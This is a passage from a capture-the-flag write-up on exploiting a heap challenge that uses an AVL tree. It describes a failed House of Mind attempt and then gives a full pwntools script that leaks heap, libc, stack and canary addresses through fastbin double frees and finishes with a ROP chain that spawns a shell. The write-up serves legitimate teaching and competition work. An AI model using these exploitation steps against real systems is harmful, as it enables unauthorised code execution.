Small caveat - at around +0x880 from the start of our fake arena, there must be a sufficiently large value that goes
into system_mem
, if not we fail this check:
if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
<= CHUNK_HDR_SZ, 0)
|| __builtin_expect (chunksize (chunk_at_offset (p, size))
>= av->system_mem, 0))
{
bool fail = true;
/* We might not have a lock at this point and concurrent modifications
of system_mem might result in a false positive. Redo the test after
getting the lock. */
if (!have_lock)
{
__libc_lock_lock (av->mutex);
fail = (chunksize_nomask (chunk_at_offset (p, size)) <= CHUNK_HDR_SZ
|| chunksize (chunk_at_offset (p, size)) >= av->system_mem);
__libc_lock_unlock (av->mutex);
}
if (fail)
malloc_printerr ("free(): invalid next size (fast)");
}
This restriction actually makes our write a lot more restricted, considering a lot of memory in libc is null bytes. This
rules out overwriting global_max_fast
. After a while, I finally found that we can use _IO_2_1_stdin_
. We can target
the _chain
field and set it to our freed chunk, then fake a file according to House of Apple. This file should give us
our shell when it’s closed on exit!
Actually, I almost got this exploit to work perfectly - I was able to fake the file and trigger an exit (on debug version, it exits when it fails the assertion). It didn’t spawn my shell because the fake file needed a bit of tweaking to make some of the necessary pointers valid (it would crash while trying to close my file). However, when I tested on remote, I realized that the exploit takes way too long to setup House of Mind (sends on average 300 chunks) and the Docker jail will kill the process before House of Mind is finished. I’m too lazy to fix this exploit since it wouldn’t work on remote, and it’s not so trivial to exit on the actual challenge binary anyway (without the printing of the tree, the only other assert possible is quite difficult to fail).
After spending a few hours on this, it was almost midnight so I went to sleep.
The next day, I looked for other vectors to convert this almost arbitrary fastbin write to RCE. After searching for a
bit, I found a reliable stack leak from libc (libc_leak + 0x2046e0
), that is always a fixed offset from the saved RIP
when create_mod
is called. Additionally, the size check can be easily passed since we can write the size just above
the stack, when the program asks for the module code. We also need the value of canary, which we can also get from libc.
The steps to leak these are similar to libc leak, so I won’t repeat it again.
With the stack leak and canary, we can prepare to allocate a fastbin chunk there. Using the double free we have, we need to write the address of the fake chunk to our poisoned fastbin chunk before writing the fake size. Then we can allocate our fake chunk, write our ROP chain and win.
For the ROP chain, there’s a small consideration: the address of Tree will be overwritten by our chain, which will crash
create_mod
before it returns. To fix this, we need to put the address back. We can use some other gadget that pops the
address into irrelevant registers to skip over the address and continue our ROP chain.
#!/usr/bin/env python3
from pwn import *
exe = ELF("./main_patched")
libc = ELF("./lib/libc.so.6")
context.binary = exe
context.terminal = ["tmux", "splitw", "-hf"]
def fastbin_encrypt(pos: int, ptr: int):
return (pos >> 12) ^ ptr
def fastbin_decrypt(val: int):
mask = 0xfff << 52
while mask:
v = val & mask
val ^= (v >> 12)
mask >>= 12
return val
if args.LOCAL:
p = process([exe.path])
if args.GDB:
gdb.attach(p)
pause()
else:
p = remote("dojo.elmo.sg", 40501)
def add(code: bytes, size: int, data: bytes):
p.sendlineafter(b"> ", b"1")
p.sendlineafter(b"code:", code)
p.sendlineafter(b"length:", str(size).encode())
p.sendlineafter(b"description:", data)
def search(code: bytes):
p.sendlineafter(b"> ", b"2")
p.sendlineafter(b"code:", code)
p.recvuntil(b"description:")
p.recvline()
return p.recvline()[:-1]
def delete(code: bytes):
p.sendlineafter(b"> ", b"3")
p.sendlineafter(b"code:", code)
# good luck pwning :)
# --- PART 1: leaks (heap, libc, stack, canary) ---
# set up the tree
for i in range(10):
add(f"CS{i}001".encode(), 0x70, b"asdf")
add(b"CS2001", 0x70, b"asdf")
# fill up 0x80 tcache
for i in range(9, 2, -1):
delete(f"CS{i}001".encode())
# uaf
delete(b"CS2001")
delete(b"CS0001")
delete(b"CS1001")
# get heap leak
heap_leak = u64(search(b"CS2001").ljust(8, b"\x00"))
heap_leak = fastbin_decrypt(heap_leak) - 0x3f0
print(hex(heap_leak))
pos1 = heap_leak + 0x980
target1 = heap_leak + 0x9d0
# double free
delete(b"CS2001")
# overwrite fastbin ptr
payload = p64(fastbin_encrypt(pos1, target1))
add(b"CS0001", 0x70, payload)
payload = flat(
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x81, # to fake a fastbin chunk here
fastbin_encrypt(heap_leak + 0x9e0, 0), 0x0,
)
# get 3 more to reach fake chunk
for i in range(3):
add(f"CS100{i}".encode(), 0x70, payload)
payload = flat(
0x0, 0x0,
0x0, 0x31,
0xdeadbeef, 0x0,
0x0, 0xcafebabe,
0x0, 0x31,
0x1ffffde29, 0x0,
# *right, *data
heap_leak + 0xd00, heap_leak + 0xb20, # unsorted leak will be here later
)
add(b"CS2000", 0x70, payload)
# make new smallbin chunks and free them for unsorted leak
for i in range(8):
add(f"CS999{i}".encode(), 0xf0, b"a")
for i in range(7, -1, -1):
delete(f"CS999{i}".encode())
libc_leak = u64(search(b"\xff\xff1337").ljust(8, b"\x00")) - 0x203b20
print(hex(libc_leak))
stack_leak_pivot = libc_leak + 0x2046e0
print(hex(stack_leak_pivot))
# stuff that didn't work :(
# global_max_fast = libc_leak + 0x1d94a0
# fake_chunk = libc_leak + 0x1d2340
# exit_funcs = libc_leak + 0x1d42f0
# set up a new double free
target2 = heap_leak + 0x1d40
pos2 = heap_leak + 0x1b20
payload = flat(
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x71,
fastbin_encrypt(target2 + 0x10, 0), 0x0,
)
for i in range(10):
add(f"CS500{i}".encode(), 0x60, payload)
for i in range(10, 20):
add(f"CS50{i}".encode(), 0x60, payload)
# clear remnant of unsorted bin
add(b"CS0010", 0x10, b"a")
# # fill tcache
delete(b"CS5019")
delete(b"CS5017")
delete(b"CS5009")
delete(b"CS5007")
delete(b"CS5005")
delete(b"CS5003")
delete(b"CS5001")
# double free in 0x70
delete(b"CS5012")
delete(b"CS5011")
delete(b"CS5013")
payload = p64(fastbin_encrypt(pos2, target2))
add(b"CS6000", 0x60, payload)
for i in range(2):
add(f"CS600{i}".encode(), 0x60, b"a")
payload = flat(
0x0, 0x0,
0x0, 0x31,
0x40cb47cc8, heap_leak + 0x19b0,
heap_leak + 0x1af0, stack_leak_pivot,
)
add(b"CS9996", 0x60, payload)
stack_leak = u64(search(b"CS5016").ljust(8, b"\x00")) - 0x140 # ret addr
print(hex(stack_leak))
canary_addr = libc_leak - 0x2898
# double free
target3 = heap_leak + 0x25b0
pos3 = heap_leak + 0x24d0
payload = flat(
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x71,
fastbin_encrypt(target3 + 0x10, 0), 0x0,
)
for i in range(10):
add(f"CS700{i}".encode(), 0x60, payload)
for i in range(10, 20):
add(f"CS70{i}".encode(), 0x60, payload)
# fill tcache
delete(b"CS7018")
delete(b"CS7002")
delete(b"CS7000")
delete(b"CS7019")
delete(b"CS7016")
delete(b"CS7014")
delete(b"CS7012")
delete(b"CS7009")
delete(b"CS7008")
delete(b"CS7010")
payload = p64(fastbin_encrypt(pos3, target3))
add(b"CS7999", 0x60, payload)
for i in range(2):
add(f"CS790{i}".encode(), 0x60, b"a")
payload = flat(
0x0, 0x0,
0x0, 0x31,
0x50cb48493, heap_leak + 0x1f50,
heap_leak + 0x29a0, canary_addr+1,
)
add(b"CS7902", 0x60, payload)
print(hex(target3))
canary = u64(search(b"CS7011")[:7].rjust(8, b"\x00"))
print(hex(canary))
# -- PART 2: write rop chain ---
target4 = stack_leak - 0x28
pos4 = heap_leak + 0x2dd0
payload = flat(
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x71,
fastbin_encrypt(target4 + 0x10, 0), 0x0,
)
for i in range(10):
add(f"CS800{i}".encode(), 0x60, payload)
for i in range(10, 20):
add(f"CS80{i}".encode(), 0x60, payload)
delete(b"CS8005")
delete(b"CS8004")
delete(b"CS8006")
payload = p64(fastbin_encrypt(pos4, target4))
add(b"CS8999", 0x60, payload)
for i in range(2):
add(f"CS890{i}".encode(), 0x60, b"a")
code = b"CS1234\x00\x00"
code += p64(0x71)
code = code[:-1]
print(code)
libc.address = libc_leak
pop_rsi_r15_rbp = libc_leak + 0x2a871
pop_rdi = libc_leak + 0x10f75b
ret = libc_leak + 0x2882f
payload = flat(
0x0, canary,
0xdeadbeef,
pop_rsi_r15_rbp, 0x100000000, heap_leak + 0x1910, 0x1,
pop_rdi, next(libc.search(b"/bin/sh\x00")),
ret, libc.sym.system
)
add(code, 0x60, payload)
p.interactive() # grey{m4573r_0f_7r335_4nd_h34p}
This challenge was a lot of fun because of how different not having tcache made things (despite having a really simple vuln). I still don’t know how AVL trees work tho…
I also solved IP Cam
, and Malware
together with scuffed (actually they did most of the reversing, I just helped a
little with the libc and decrypting the flag). I’m too lazy to write writeups for them (especially IP Cam
since I
don’t have access to the camera anymore), but still cool challs nonetheless!